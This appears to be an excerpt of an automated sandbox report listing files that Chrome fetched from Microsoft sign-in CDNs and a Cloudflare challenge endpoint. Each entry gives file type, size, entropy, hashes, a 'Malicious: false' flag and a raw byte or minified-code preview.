                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                            Category:dropped
                                                            Size (bytes):5525
                                                            Entropy (8bit):7.961202222662501
                                                            Encrypted:false
                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                            Category:downloaded
                                                            Size (bytes):35170
                                                            Entropy (8bit):7.993096534744333
                                                            Encrypted:true
                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                            Category:downloaded
                                                            Size (bytes):16345
                                                            Entropy (8bit):7.98960525258912
                                                            Encrypted:false
                                                            SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                            MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                            SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                            SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                            SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                            Category:dropped
                                                            Size (bytes):673
                                                            Entropy (8bit):7.6596900876595075
                                                            Encrypted:false
                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):3620
                                                            Entropy (8bit):6.867828878374734
                                                            Encrypted:false
                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                            Category:dropped
                                                            Size (bytes):17174
                                                            Entropy (8bit):2.9129715116732746
                                                            Encrypted:false
                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                            Category:dropped
                                                            Size (bytes):116343
                                                            Entropy (8bit):7.997640489040715
                                                            Encrypted:true
                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):48316
                                                            Entropy (8bit):5.6346993394709
                                                            Encrypted:false
                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                            Category:downloaded
                                                            Size (bytes):61052
                                                            Entropy (8bit):7.996159932827634
                                                            Encrypted:true
                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):3452
                                                            Entropy (8bit):5.117912766689607
                                                            Encrypted:false
                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://login.live.com/Me.htm?v=3
                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                            Category:dropped
                                                            Size (bytes):61052
                                                            Entropy (8bit):7.996159932827634
                                                            Encrypted:true
                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                            Category:downloaded
                                                            Size (bytes):1435
                                                            Entropy (8bit):7.8613342322590265
                                                            Encrypted:false
                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
